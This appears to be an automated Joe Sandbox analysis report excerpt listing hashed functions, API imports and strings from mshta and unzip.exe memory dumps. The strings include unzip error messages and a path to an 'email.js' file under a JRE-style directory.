Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0DCF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0DE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0D9F Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0D97 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0DBF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0D3F Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0D37 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0D27 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0CDF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0CCF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0CC7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0C9F Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0C97 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Analysis Process: unzip.exePID: 7952, Parent PID: 7844COMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.6%
Total number of Nodes:	1160
Total number of Limit Nodes:	41

Executed Functions

Function 00419BD0 Relevance: 75.8, APIs: 32, Strings: 11, Instructions: 568
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00419C40
malloc.MSVCRT ref: 00419C58
strcpy.MSVCRT ref: 00419C6E
_isctype.MSVCRT ref: 00419C90
realloc.MSVCRT ref: 00419D4E
free.MSVCRT ref: 00419D63
sprintf.MSVCRT ref: 00419D9D
free.MSVCRT ref: 00419DC8
free.MSVCRT ref: 00419DE0
free.MSVCRT ref: 00419E75
malloc.MSVCRT ref: 00419E9D
malloc.MSVCRT ref: 00419ED7
GetFullPathNameA.KERNEL32 ref: 00419F2F
GetDriveTypeA.KERNEL32 ref: 0041A00A
free.MSVCRT ref: 0041A020
free.MSVCRT ref: 0041A02E
sprintf.MSVCRT ref: 0041A057
tolower.MSVCRT ref: 0041A093
strcpy.MSVCRT ref: 0041A0E6
strcpy.MSVCRT ref: 0041A26E
free.MSVCRT ref: 0041A27C
free.MSVCRT ref: 0041A28A

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 00419D7D, 0041A200, 0041A3E9, 0041A45E, 0041A528
checkdir error: path too long: %s, xrefs: 0041A403
checkdir warning: path too long; truncating %s -> %s, xrefs: 0041A223
checkdir error: %s exists but is not directory unable to process %s., xrefs: 0041A55C
checkdir warning: current dir path too long, xrefs: 0041A048
checkdir: cannot create extraction directory: %s, xrefs: 00419D8E
checkdir error: cannot create %s unable to process %s., xrefs: 0041A492
%, xrefs: 00419DB6, 0041A070, 0041A24B, 0041A42B, 0041A4BA
/, xrefs: 00419FFD
jre/jre-1.8/lib/deploy/email.js, xrefs: 0041A20A, 0041A466, 0041A530
:, xrefs: 00419FEE

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: free$mallocstrcpy$sprintf$DriveFullNamePathType_isctypereallocstrlentolower
String ID: %$/$:$checkdir error: %s exists but is not directory unable to process %s.$checkdir error: cannot create %s unable to process %s.$checkdir error: path too long: %s$checkdir warning: path too long; truncating %s -> %s$checkdir warning: current dir path too long$checkdir: cannot create extraction directory: %s$jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js
API String ID: 1808529857-1922604021
Opcode ID: 3e1ad46ef810d6bc5954663d941d91afbfbf9b3cb4a8240a14bdecfbbc54b312
Instruction ID: 8493f3f334d15266ecb4fd51785c3009e433380db715e908688b4ca2de6235f5
Opcode Fuzzy Hash: 3e1ad46ef810d6bc5954663d941d91afbfbf9b3cb4a8240a14bdecfbbc54b312
Instruction Fuzzy Hash: BB32B17150AB51AFC310DF25E4902ABBBE1BF85314F94986ED8844B311DBBD9C85CF8A

Function 00405B34 Relevance: 53.1, APIs: 23, Strings: 6, Instructions: 2370stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 004068B4
_lseeki64.MSVCRT ref: 00406A29
_read.MSVCRT ref: 00406A4E
free.MSVCRT ref: 00406ABD
free.MSVCRT ref: 00406AF8
sprintf.MSVCRT ref: 00406BBB
sprintf.MSVCRT ref: 00406C1E
sprintf.MSVCRT ref: 00406C78
sprintf.MSVCRT ref: 00406CD0
sprintf.MSVCRT ref: 00406D22
sprintf.MSVCRT ref: 00406D45
sprintf.MSVCRT ref: 00406D72
sprintf.MSVCRT ref: 00406DA7
sprintf.MSVCRT ref: 00406DFB
sprintf.MSVCRT ref: 00406E47
malloc.MSVCRT ref: 00406E89
free.MSVCRT ref: 00406EFA
free.MSVCRT ref: 00406F1D
sprintf.MSVCRT ref: 00406F40
sprintf.MSVCRT ref: 00406F8C
free.MSVCRT ref: 00406FC7

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 004070B7, 00407111, 0040714F
warning-, xrefs: 004067AA, 00406BFB
`pB, xrefs: 00406DDF
%, xrefs: 00406BD4, 00406C37, 00406C91, 00406D8B, 00406DC0, 00406E14, 00406E60, 00406F59, 00406FA5, 004070F7
jre/jre-1.8/lib/deploy/email.js, xrefs: 00407074, 004070BF, 00407119, 00407157
\pB, xrefs: 00406E2B, 00407067

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$free$_lseeki64_readmallocstrncmp
String ID: %$\pB$`pB$jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js$warning-
API String ID: 2246773340-2542640824
Opcode ID: 4013e1fa5fbf3c48879748bdd8235d3496e292fa2ea3b51b6331eead9f9177d5
Instruction ID: 40d82744cc3fee6943f4487b790a5b6211636207d68294b7b30732f409579ab3
Opcode Fuzzy Hash: 4013e1fa5fbf3c48879748bdd8235d3496e292fa2ea3b51b6331eead9f9177d5
Instruction Fuzzy Hash: 8EF2D67251D7E14AC7129F60866911ABFA1BF13310F1A48AFD8C26B2E3C37C9911DB5E

Function 004203F0 Relevance: 45.9, APIs: 18, Strings: 8, Instructions: 379
librarystringloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00422230: strlen.MSVCRT ref: 00422258
Part of subcall function 00422230: strlen.MSVCRT ref: 00422273
Part of subcall function 00422230: free.MSVCRT ref: 00422295

strlen.MSVCRT ref: 0042041A
GetDriveTypeA.KERNEL32 ref: 0042043C
strrchr.MSVCRT ref: 004204BB
LoadLibraryA.KERNEL32 ref: 00420524
GetProcAddress.KERNEL32 ref: 00420539
GetCompressedFileSizeA.KERNELBASE ref: 00420554
FreeLibrary.KERNEL32 ref: 0042057F
free.MSVCRT ref: 0042063E
_stricmp.MSVCRT ref: 0042085F

Strings

KERNEL32.DLL, xrefs: 00420710
PK, xrefs: 00420754, 004207A6, 004207E3, 004207F6
GetCompressedFileSizeA, xrefs: 0042052E
KERNEL32, xrefs: 0042051D
GetBinaryTypeA, xrefs: 00420723
PATHEXT, xrefs: 004207D7
.lnk, xrefs: 004204D0
., xrefs: 0042078F

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: strlen$Libraryfree$AddressCompressedDriveFileFreeLoadProcSizeType_stricmpstrrchr
String ID: .$.lnk$GetBinaryTypeA$GetCompressedFileSizeA$KERNEL32$KERNEL32.DLL$PATHEXT$PK
API String ID: 3207394586-3996524840
Opcode ID: 7fc54d008dbeb3bec4eba22a6a7a5a1712c6a4e99d2615b52bb77fee751cfcb0
Instruction ID: f723f06103fc8ffd8ad1d02b2f45e97e1bff8ee97ba6b4e178702c0f8ac15503
Opcode Fuzzy Hash: 7fc54d008dbeb3bec4eba22a6a7a5a1712c6a4e99d2615b52bb77fee751cfcb0
Instruction Fuzzy Hash: 02E18171B087248FC714EF25A48022BB7E5BFC8714F95892EE99497352D778EC058F8A

Function 004012CB Relevance: 23.8, APIs: 9, Strings: 3, Instructions: 2801COMMON

Download Yara Rule

Strings

> qu, xrefs: 004024FD
zipinfo, xrefs: 004014FE, 0040263B
> '_, xrefs: 00401855

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID:
String ID: > '_$> qu$zipinfo
API String ID: 0-1717634931
Opcode ID: 0b35a06aefed4cf2635caf2c83113ff68816f23467070681b1eb60e3aa52ebd4
Instruction ID: 02ee7265650863154c597424a30a2c9431394cc4f9859e68a3c24ada1595922b
Opcode Fuzzy Hash: 0b35a06aefed4cf2635caf2c83113ff68816f23467070681b1eb60e3aa52ebd4
Instruction Fuzzy Hash: 06F2377255C7E409CB269B70476E166BF65BA23310B1C05EFC8C12B6F3C2B9AA11D74E

Function 0041FE80 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 91
stringlibraryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 0041FE9A
GetProcAddress.KERNEL32 ref: 0041FEB5
strlen.MSVCRT ref: 0041FEC4
malloc.MSVCRT ref: 0041FED1
strcpy.MSVCRT ref: 0041FEEC
strcat.MSVCRT ref: 0041FF11
FindFirstFileExA.KERNELBASE ref: 0041FF4D
FindNextFileA.KERNEL32 ref: 0041FF6F
FindClose.KERNEL32 ref: 0041FF7E
FreeLibrary.KERNEL32 ref: 0041FF8D
FindFirstFileA.KERNEL32 ref: 0041FFA9

Strings

KERNEL32.DLL, xrefs: 0041FE93

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Find$File$FirstLibrary$AddressCloseFreeLoadNextProcmallocstrcatstrcpystrlen
String ID: KERNEL32.DLL
API String ID: 3309828319-2576044830
Opcode ID: 3b6678d1593b4a21060d9abfb4bd96f3d7a8e04c6ac03e7cad59dc8c775d3026
Instruction ID: aa158c120d6bf8d549777575ac43ca18399910ca9cc1ddaa47d9192c32ad303c
Opcode Fuzzy Hash: 3b6678d1593b4a21060d9abfb4bd96f3d7a8e04c6ac03e7cad59dc8c775d3026
Instruction Fuzzy Hash: 443163B05087548BC310BF3994447AFBBE4AF85718F45892FF8D847351D778998A8B8B

Function 00401079 Relevance: 13.6, APIs: 9, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?,?,00401018), ref: 0040108E
__getmainargs.MSVCRT ref: 004010C9
_setmode.MSVCRT ref: 004010F0
_setmode.MSVCRT ref: 00401110
_setmode.MSVCRT ref: 00401130
__p__fmode.MSVCRT ref: 00401135
__p__environ.MSVCRT ref: 00401147
_cexit.MSVCRT ref: 0040116C
ExitProcess.KERNEL32 ref: 00401174

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _setmode$ExceptionExitFilterProcessUnhandled__getmainargs__p__environ__p__fmode_cexit
String ID:
API String ID: 3695137517-0
Opcode ID: db0d2f9c70d337c31b01301fb8bf43f7167b969f4d391ef8153f37c463bd3519
Instruction ID: d8982147967034d0c855693b2e4ee71f0e4a78d824b5293da4ce44c9492f0246
Opcode Fuzzy Hash: db0d2f9c70d337c31b01301fb8bf43f7167b969f4d391ef8153f37c463bd3519
Instruction Fuzzy Hash: 022110707087109FC318EF26E48162EBBB1BF88314FC0892EE58557365D738A845CF9A

Function 0041FFD0 Relevance: 6.3, APIs: 4, Instructions: 261pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00420010
GetFileInformationByHandle.KERNEL32 ref: 0042003C
GetFileSize.KERNEL32 ref: 0042031F
PeekNamedPipe.KERNEL32 ref: 00420366

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: File$HandleInformationNamedPeekPipeSizeType
String ID:
API String ID: 1123014988-0
Opcode ID: a86d0f110124e6c3111286ed97da3e1c141907cadf2ec27bf3129d52e3569518
Instruction ID: 8a30cbd4670b9e5f70fbfb84512ba543e0dbd6fde4ffec1c88aab7c57137e3ca
Opcode Fuzzy Hash: a86d0f110124e6c3111286ed97da3e1c141907cadf2ec27bf3129d52e3569518
Instruction Fuzzy Hash: 8FA17C71A087508FD328DF69D48075BBBE2FBC8704F55C92EE9899B342D7789805CB86

Function 0040B130 Relevance: 3.1, APIs: 2, Instructions: 119timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32 ref: 0040B200
localtime.MSVCRT ref: 0040B25F

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: InformationTimeZonelocaltime
String ID:
API String ID: 2130894942-0
Opcode ID: 3cce14f39ddc7df742cbda3b43643e6fc4a11df46faeb8d3ade2704df28152b5
Instruction ID: 47c518a10fd2e61c0f0588b5d0164664913f1ec9874b5c16606ab92167db3cb9
Opcode Fuzzy Hash: 3cce14f39ddc7df742cbda3b43643e6fc4a11df46faeb8d3ade2704df28152b5
Instruction Fuzzy Hash: 30418531504B068BC324DE19C8846ABB3A1FBC4364F548B7ED9755B3D5E734AA0ACBC9

Function 0040C88E Relevance: 1.6, APIs: 1, Instructions: 353COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0040CBB2

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 7d11508c6f44894455e3fb5d20d914a39bc35e7314e33e0682beb1c85c082b3a
Instruction ID: 009a6030428d818df916130d968be3f9c9b904f6d8ae42026d0614cd58c64784
Opcode Fuzzy Hash: 7d11508c6f44894455e3fb5d20d914a39bc35e7314e33e0682beb1c85c082b3a
Instruction Fuzzy Hash: 4FF145726087058FC324DF18D48039BB7E2BFC8318F554A2EE899A7380D775A946CF86

Function 00422110 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceA.KERNEL32 ref: 0042218B

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: 544b7e7b093e349b290e24b263e892792c5a0daa57c01203b4428f09bf55173c
Instruction ID: d528013b30f80289a487aac5b3e8f893bd3f6b1dd8c9c2ceae59a886fcb3d62f
Opcode Fuzzy Hash: 544b7e7b093e349b290e24b263e892792c5a0daa57c01203b4428f09bf55173c
Instruction Fuzzy Hash: 0B1166B89093519B8300DF1AC18040AFBF0BFC8664F959A5EF99863321D374EA558F97

Function 00409EE0 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 185
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A590: CreateFileA.KERNEL32 ref: 0041A607
Part of subcall function 0041A590: GetFileTime.KERNEL32 ref: 0041A635
Part of subcall function 0041A590: CloseHandle.KERNEL32 ref: 0041A642

fopen.MSVCRT ref: 00409F3F
sprintf.MSVCRT ref: 00409F74
_chmod.MSVCRT ref: 00409FF7
strlen.MSVCRT ref: 0040A00D
malloc.MSVCRT ref: 0040A06B
strcpy.MSVCRT ref: 0040A095
strcpy.MSVCRT ref: 0040A0B7

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 00409F4D, 00409FC6, 0040A151
error: cannot create %s, xrefs: 00409F65
